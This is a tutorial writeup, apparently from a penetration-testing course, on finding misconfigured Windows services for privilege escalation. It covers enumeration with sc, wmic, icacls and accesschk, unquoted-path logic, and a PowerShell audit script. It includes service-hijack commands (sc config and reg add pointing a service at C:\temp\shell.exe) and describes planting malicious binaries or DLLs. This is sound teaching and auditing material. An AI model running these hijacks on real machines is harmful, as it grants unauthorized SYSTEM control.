Windows Service Enumeration

beginner · 25 min · Writeup

Finding misconfigured services

Learning Objectives

  • Enumerate Windows services
  • Check service permissions
  • Identify vulnerable services
  • Find unquoted service paths

Windows services are background programs that run with specific privileges. Many run as SYSTEM - the highest Windows privilege level. If a service is misconfigured, we can hijack it to run our code as SYSTEM. Service exploitation is one of the most reliable Windows privilege escalation methods.

Think of services like robots in a factory. They do specific jobs, often with master keys (SYSTEM access). If we can reprogram a robot, it will use its master key to do our bidding. The key is finding robots we can modify.

High Success Rate

Service-based attacks are common in both CTFs and real environments. Always enumerate services thoroughly - you'll often find an easy path to SYSTEM.

Listing Services

batch
REM List all running services
sc query
net start

REM List ALL services (running and stopped)
sc query state= all

REM Note: the space after = is required!
sc query state= all type= service

REM Get service details
sc qc ServiceName
REM Shows: binary path, start type, service account

REM Example output:
REM [SC] QueryServiceConfig SUCCESS
REM
REM SERVICE_NAME: VulnService
REM         TYPE               : 10  WIN32_OWN_PROCESS
REM         START_TYPE         : 2   AUTO_START
REM         ERROR_CONTROL      : 1   NORMAL
REM         BINARY_PATH_NAME   : C:\Program Files\Vulnerable\service.exe
REM         LOAD_ORDER_GROUP   :
REM         TAG                : 0
REM         DISPLAY_NAME       : Vulnerable Service
REM         DEPENDENCIES       :
REM         SERVICE_START_NAME : LocalSystem

WMIC for Service Enumeration

batch
REM Get all services with details
wmic service get name,displayname,pathname,startmode

REM Format as list for readability
wmic service get name,pathname,startmode /format:list

REM Filter for specific properties
wmic service where "StartMode='Auto'" get name,pathname

REM Find services running as SYSTEM
wmic service get name,startname,pathname | findstr /i "LocalSystem"

REM Export to file for analysis
wmic service get name,displayname,pathname,startmode > services.txt

Look for LocalSystem

Services running as LocalSystem, NT AUTHORITY\SYSTEM, or LocalService are your targets. Exploiting these = SYSTEM shell.

Service Vulnerability Types

Service Privilege Escalation Vectors:
├── Unquoted Service Paths
│   ├── Path with spaces, not quoted
│   ├── Windows searches for binaries in order
│   ├── Example: C:\Program Files\My App\service.exe
│   └── Exploit: Place malicious C:\Program.exe
├── Weak Binary Permissions
│   ├── Service binary is writable by us
│   ├── Replace binary with malicious one
│   └── Restart service = code execution
├── Weak Service Configuration
│   ├── We can modify service properties
│   ├── Change BINARY_PATH_NAME to our payload
│   └── Restart service = code execution
├── DLL Hijacking
│   ├── Service loads DLL from writable location
│   ├── Place malicious DLL there
│   └── Service loads our DLL = code execution
└── Registry Permissions
    ├── Service config in registry is writable
    ├── Modify ImagePath to our payload
    └── Restart service = code execution

Finding Unquoted Paths

batch
REM Find unquoted service paths (auto-start, outside C:\Windows, no quotes)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """"

REM PowerShell method (run in PowerShell)
Get-WmiObject win32_service | Select-Object Name, PathName, StartMode | Where-Object {$_.PathName -like "* *"} | Format-List
REM Note: -like "* *" also matches quoted paths that contain spaces, so confirm each hit has no quotes

REM What makes a path vulnerable:
REM 1. Contains spaces: C:\Program Files\App\svc.exe
REM 2. Not quoted:      C:\Program Files\App\svc.exe
REM    vs safe:         "C:\Program Files\App\svc.exe"

REM Why it matters:
REM Windows parses unquoted paths with spaces:
REM   C:\Program Files\My App\service.exe
REM Windows tries (in order):
REM   1. C:\Program.exe
REM   2. C:\Program Files\My.exe
REM   3. C:\Program Files\My App\service.exe
REM If we can write to any of those locations, we win!

Common Unquoted Paths

Third-party software in C:\Program Files is the most common source of unquoted paths. Default Windows services are typically quoted.

Checking Permissions

batch
REM Check binary permissions with icacls
icacls "C:\Program Files\Vulnerable\service.exe"
REM Look for: (F)ull, (M)odify, (W)rite for your user/group

REM Check directory permissions
icacls "C:\Program Files\Vulnerable"

REM Using accesschk from Sysinternals
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
accesschk.exe -uwcqv %username% *

REM Check specific service permissions
accesschk.exe -uwcqv "VulnService"
REM Shows: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG, etc.

REM Check service binary permissions
accesschk.exe -wvu "C:\Program Files\Vulnerable\service.exe"

REM Check if you can start/stop service
accesschk.exe -ucqv VulnService

REM PowerShell alternative
Get-Acl "C:\Program Files\Vulnerable\service.exe" | Format-List

Permission Meanings

ICACLS Permission Flags:
├── F  - Full Control (read, write, execute, modify, delete)
├── M  - Modify (read, write, execute, delete)
├── RX - Read and Execute
├── R  - Read only
├── W  - Write only
└── D  - Delete

Dangerous Permissions:
├── (F) or (M) on service binary = can replace binary
├── (F) or (M) on directory = can add files (DLL hijack)
├── SERVICE_CHANGE_CONFIG = can modify service path
└── SERVICE_ALL_ACCESS = full control of service

User Groups to Check:
├── Your username
├── Users
├── Authenticated Users
├── Everyone
└── BUILTIN\Users

Service Configuration Permissions

batch
REM Check if we can modify service configuration
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula

REM Look for services with:
REM   RW [service_name]
REM   SERVICE_ALL_ACCESS
REM   SERVICE_CHANGE_CONFIG

REM Example output:
REM   VulnService
REM     RW NT AUTHORITY\Authenticated Users
REM        SERVICE_ALL_ACCESS

REM This means we can modify the service!
REM Change binary path to our payload:
sc config VulnService binPath= "C:\temp\shell.exe"

REM Query to verify change
sc qc VulnService

Restart Permissions

Even if you can modify a service, you need restart permissions or must wait for system reboot. Check: accesschk.exe -ucqv ServiceName for SERVICE_START and SERVICE_STOP.

Registry Service Checks

batch
REM Services are configured in registry
REM HKLM\SYSTEM\CurrentControlSet\Services\[ServiceName]

REM Check registry permissions
accesschk.exe -kvuqsw hklm\System\CurrentControlSet\services

REM Or specific service
reg query HKLM\SYSTEM\CurrentControlSet\Services\VulnService

REM Check ImagePath value
reg query HKLM\SYSTEM\CurrentControlSet\Services\VulnService /v ImagePath

REM If we can write to registry:
reg add HKLM\SYSTEM\CurrentControlSet\Services\VulnService /v ImagePath /t REG_EXPAND_SZ /d "C:\temp\shell.exe" /f

Service Enumeration Methodology

Service Enumeration Flow

  1. List Services - wmic service get name,pathname,startmode
  2. Find SYSTEM - filter for services running as LocalSystem
  3. Unquoted Paths - check for spaces without quotes
  4. Binary Perms - icacls on each service binary
  5. Config Perms - accesschk for SERVICE_CHANGE_CONFIG
  6. Restart Check - verify we can restart the service
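The unquoted-path parsing and the first four steps of the flow above, as an added audit script that is not part of the original writeup: it walks every service, pulls the executable out of PathName, flags unquoted paths containing spaces, lists the intermediate files Windows would try first (C:\Program.exe, C:\Program Files\My.exe, ...), and probes whether the current user can write to those directories or to the binary's own directory. The function names (Get-ServiceExecutable, Get-UnquotedCandidatePaths, Test-WritableByMe, Get-ServiceAuditReport) are my own; it assumes PowerShell 3+ for Get-CimInstance.

```powershell
# Added audit example (not code from the original writeup). Run from an ordinary user prompt.
function Get-ServiceExecutable {
    param([string]$PathName)
    # Quoted path: the executable is whatever sits between the first pair of quotes.
    if ($PathName -match '^\s*"([^"]+)"') { return @{ Exe = $Matches[1]; Quoted = $true } }
    # Unquoted path: take everything up to the first ".exe"; with no ".exe" keep the whole string.
    $exe = if ($PathName -match '^\s*(.+?\.exe)') { $Matches[1] } else { $PathName.Trim() }
    return @{ Exe = $exe; Quoted = $false }
}

function Get-UnquotedCandidatePaths {
    param([string]$Exe)
    # Every prefix that ends just before a space, in the order Windows tries them:
    # "C:\Program Files\My App\service.exe" -> C:\Program.exe, C:\Program Files\My.exe
    $candidates = @()
    $idx = $Exe.IndexOf(' ')
    while ($idx -gt 0) {
        $candidates += ($Exe.Substring(0, $idx) + '.exe')
        $idx = $Exe.IndexOf(' ', $idx + 1)
    }
    return $candidates
}

function Test-WritableByMe {
    param([string]$Dir)
    # Probe a directory by creating and deleting a throwaway file: an actual access check
    # avoids having to expand group membership the way parsing icacls output would.
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try { [System.IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; return $true }
    catch { return $false }
}

function Get-ServiceAuditReport {
    Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $p = Get-ServiceExecutable $_.PathName
        $notes = @()
        if (-not $p.Quoted -and $p.Exe.Contains(' ')) {
            $hops = Get-UnquotedCandidatePaths $p.Exe | Where-Object { Test-WritableByMe (Split-Path -Path $_ -Parent) }
            $notes += 'unquoted path' + $(if ($hops) { " (writable hop dir for: $($hops -join ', '))" })
        }
        $dir = Split-Path -Path $p.Exe -Parent
        if ($dir -and (Test-WritableByMe $dir)) { $notes += "writable binary directory $dir" }
        [pscustomobject]@{ Name = $_.Name; RunsAs = $_.StartName; StartMode = $_.StartMode; Exe = $p.Exe; Findings = ($notes -join '; ') }
    } | Where-Object { $_.Findings }
}

# LocalSystem services with findings are the ones to confirm with icacls and accesschk.
Get-ServiceAuditReport | Sort-Object RunsAs | Format-Table -AutoSize
```

The directory probe does not examine the binary's own ACL or the service's SERVICE_CHANGE_CONFIG rights, so each hit still needs the icacls and accesschk checks from the sections above.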

Knowledge Check


What makes a service path vulnerable to unquoted path exploitation?

Challenges

Find Vulnerable Services

Challenge (intermediate)

Enumerate all services on a Windows machine and identify at least one service with: unquoted path, weak binary permissions, or modifiable configuration.


Key Takeaways

  • Focus on services running as LocalSystem (SYSTEM account)
  • Unquoted paths with spaces = potential hijacking
  • Check binary permissions with icacls
  • SERVICE_CHANGE_CONFIG lets you modify the binary path
  • You need restart permission or wait for reboot to trigger exploit
  • accesschk.exe is essential for permission enumeration